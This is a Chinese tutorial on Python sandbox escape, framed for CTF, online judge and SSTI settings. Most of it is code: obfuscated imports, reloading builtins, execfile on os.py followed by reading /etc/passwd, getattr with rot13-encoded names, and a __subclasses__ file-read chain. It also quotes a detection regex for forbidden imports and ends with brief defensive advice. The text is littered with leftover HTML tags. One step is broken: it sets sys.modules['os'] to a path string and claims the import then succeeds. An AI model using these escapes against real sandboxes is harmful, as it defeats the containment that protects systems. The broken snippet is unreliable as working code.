Python沙箱逃逸技术详解<\/h1>

0x00 Python沙箱逃逸概述<\/h2>
Python沙箱逃逸是指在受限的代码执行环境(如OJ平台或使用socat生成的交互式终端)中，绕过各种过滤和限制，最终获取shell权限的过程。主要目标包括：<\/p>
使用os包中的popen、system函数执行shell命令<\/li>
使用commands模块中的方法<\/li>
使用subprocess模块<\/li>
通过写文件到指定位置再配合其他手段<\/li> <\/ul>
基本shell执行方法示例：<\/p>
import<\/span> os
<\/span><\/span>import<\/span> subprocess
<\/span><\/span>import<\/span> commands
<\/span><\/span>
<\/span><\/span>os.<\/span>system('ifconfig'<\/span>)
<\/span><\/span>os.<\/span>popen('ifconfig'<\/span>)
<\/span><\/span>commands.<\/span>getoutput('ifconfig'<\/span>)
<\/span><\/span>commands.<\/span>getstatusoutput('ifconfig'<\/span>)
<\/span><\/span>subprocess.<\/span>call(['ifconfig'<\/span>], shell=<\/span>True<\/span>)
<\/span><\/span><\/code><\/pre>0x01 import相关基础<\/h2>
防御者通常会检测敏感包的导入：<\/p>
import<\/span> re
<\/span><\/span>code =<\/span> open('code.py'<\/span>).<\/span>read()
<\/span><\/span>pattern =<\/span> re.<\/span>compile('import\s+(os|commands|subprocess|sys)'<\/span>)
<\/span><\/span>match =<\/span> re.<\/span>search(pattern, code)
<\/span><\/span>if<\/span> match:
<\/span><\/span>    print "forbidden module import detected"<\/span>
<\/span><\/span>    raise<\/span> Exception<\/span>
<\/span><\/span><\/code><\/pre>绕过方法：<\/p>

使用__import__<\/code>函数<\/li>
<\/ol>
f3ck =<\/span> __import__("pbzznaqf"<\/span>.<\/span>decode('rot_13'<\/span>))  # rot13解码后是"commands"<\/span>
<\/span><\/span>print f3ck.<\/span>getoutput('ifconfig'<\/span>)
<\/span><\/span><\/code><\/pre>
使用importlib库<\/li>
<\/ol>
import<\/span> importlib
<\/span><\/span>f3ck =<\/span> importlib.<\/span>import_module("pbzznaqf"<\/span>.<\/span>decode('rot_13'<\/span>))
<\/span><\/span>print f3ck.<\/span>getoutput('ifconfig'<\/span>)
<\/span><\/span><\/code><\/pre>0x02 import进阶<\/h2>
Python内置函数属于__builtin__<\/code>模块(python3中为builtins<\/code>)。防御者可能删除危险函数：<\/p>
del<\/span> __builtin__.<\/span>chr
<\/span><\/span>chr(1<\/span>)  # 将抛出NameError<\/span>
<\/span><\/span><\/code><\/pre>绕过方法：<\/p>

使用reload重新加载__builtin__<\/code><\/li>
<\/ol>
import<\/span> imp
<\/span><\/span>imp.<\/span>reload(__builtin__)
<\/span><\/span><\/code><\/pre>0x03 import高级<\/h2>
Python模块查找路径：<\/p>
sys.<\/span>path  # 查看模块搜索路径<\/span>
<\/span><\/span>sys.<\/span>modules  # 已加载模块字典<\/span>
<\/span><\/span><\/code><\/pre>防御者可能删除模块引用：<\/p>
sys.<\/span>modules['os'<\/span>] =<\/span> None<\/span>
<\/span><\/span>import<\/span> os  # 将失败<\/span>
<\/span><\/span><\/code><\/pre>绕过方法：<\/p>

手动恢复模块路径<\/li>
<\/ol>
sys.<\/span>modules['os'<\/span>] =<\/span> '\/usr\/lib\/python2.7\/os.py'<\/span>
<\/span><\/span>import<\/span> os  # 成功<\/span>
<\/span><\/span><\/code><\/pre>0x04 直接执行模块代码<\/h2>
当无法导入模块时，可直接执行模块文件：<\/p>
execfile('\/usr\/lib\/python2.7\/os.py'<\/span>)
<\/span><\/span>system('cat \/etc\/passwd'<\/span>)  # 成功执行<\/span>
<\/span><\/span><\/code><\/pre>或使用文件操作+exec：<\/p>
with<\/span> open('\/usr\/lib\/python2.7\/os.py'<\/span>) as<\/span> f:
<\/span><\/span>    exec(f.<\/span>read())
<\/span><\/span>system('ifconfig'<\/span>)
<\/span><\/span><\/code><\/pre>0x05 dir与__dict__<\/h2>
查看对象属性和方法：<\/p>
dir(os)  # 列出os模块所有属性和方法<\/span>
<\/span><\/span>A.<\/span>__dict__  # 查看类A的所有属性和方法<\/span>
<\/span><\/span><\/code><\/pre>0x06 绕过字符串过滤<\/h2>
当函数名被过滤时，使用getattr动态获取：<\/p>
import<\/span> codecs
<\/span><\/span>getattr(os, codecs.<\/span>encode("flfgrz"<\/span>, 'rot_13'<\/span>))('ifconfig'<\/span>)  # flfgrz rot13解码为system<\/span>
<\/span><\/span><\/code><\/pre>字符串处理技巧：<\/p>
s =<\/span> "emit"<\/span>
<\/span><\/span>s =<\/span> s[::-<\/span>1<\/span>]  # 反转字符串得到"time"<\/span>
<\/span><\/span>a[s]  # 等价于a['time']<\/span>
<\/span><\/span><\/code><\/pre>0x07 获取当前模块引用<\/h2>
通过sys.modules获取当前模块：<\/p>
main_module =<\/span> sys.<\/span>modules[__name__]
<\/span><\/span>dir(main_module)  # 查看当前模块所有内容<\/span>
<\/span><\/span><\/code><\/pre>0x08 func_code属性<\/h2>
获取函数字节码信息：<\/p>
def<\/span> f3ck<\/span>(asd):
<\/span><\/span>    a =<\/span> 1<\/span>
<\/span><\/span>    b =<\/span> "asdasd"<\/span>
<\/span><\/span>    c =<\/span> ["asd"<\/span>, 1<\/span>, None<\/span>, {'1'<\/span>: 2<\/span>}]
<\/span><\/span>    
<\/span><\/span>f3ck.<\/span>func_code  # 获取代码对象<\/span>
<\/span><\/span>dir(f3ck.<\/span>func_code)  # 查看代码对象属性<\/span>
<\/span><\/span>f3ck.<\/span>func_code.<\/span>co_consts  # 查看函数常量<\/span>
<\/span><\/span><\/code><\/pre>使用dis模块反汇编字节码：<\/p>
import<\/span> dis
<\/span><\/span>dis.<\/span>dis(f3ck.<\/span>func_code.<\/span>co_code)
<\/span><\/span><\/code><\/pre>0x09 MRO相关操作<\/h2>
通过MRO获取父类和方法：<\/p>
1.<\/span>.<\/span>__class__.<\/span>__mro__  # (float, object)<\/span>
<\/span><\/span>""<\/span>.<\/span>__class__.<\/span>__mro__  # (str, basestring, object)<\/span>
<\/span><\/span><\/code><\/pre>文件操作绕过示例：<\/p>
""<\/span>.<\/span>__class__.<\/span>__mro__[-<\/span>1<\/span>].<\/span>__subclasses__()[40<\/span>](filename).<\/span>read()
<\/span><\/span><\/code><\/pre>0x10 伪Private属性<\/h2>
Python中的"私有"属性和方法(双下划线开头)实际上可通过特定方式访问：<\/p>
class<\/span> A<\/span>:
<\/span><\/span>    __a =<\/span> 1<\/span>
<\/span><\/span>    b =<\/span> 2<\/span>
<\/span><\/span>    def<\/span> __c<\/span>(self):
<\/span><\/span>        print "asd"<\/span>
<\/span><\/span>    def<\/span> d<\/span>(self):
<\/span><\/span>        print 'dsa'<\/span>
<\/span><\/span>
<\/span><\/span>dir(A)  # 显示['_A__a', '_A__c', 'b', 'd']<\/span>
<\/span><\/span>A.<\/span>_A__c(A())  # 调用"私有"方法<\/span>
<\/span><\/span><\/code><\/pre>0x11 常见应用场景<\/h2>


在线代码运行环境<\/p>

通常过滤较少但环境受限<\/li>
后渗透工作可能较困难<\/li>
<\/ul>
<\/li>

Python交互式shell<\/p>

根据业务场景有不同限制<\/li>
通常比完全沙箱环境容易突破<\/li>
<\/ul>
<\/li>

SSTI(服务器端模板注入)<\/p>

Flask等框架模板解析环境受限<\/li>
突破后可获取较高权限<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>


多层面防御：<\/p>

禁用危险模块<\/li>
删除危险builtin函数<\/li>
限制模块导入<\/li>
监控执行行为<\/li>
<\/ul>
<\/li>

深度防御：<\/p>

使用专用沙箱环境<\/li>
限制系统调用<\/li>
资源配额控制<\/li>
定期审计和更新<\/li>
<\/ul>
<\/li>

针对Python沙箱的专门防护：<\/p>

限制反射操作<\/li>
控制属性访问<\/li>
禁用字节码操作<\/li>
监控异常行为模式<\/li>
<\/ul>
<\/li>
<\/ol>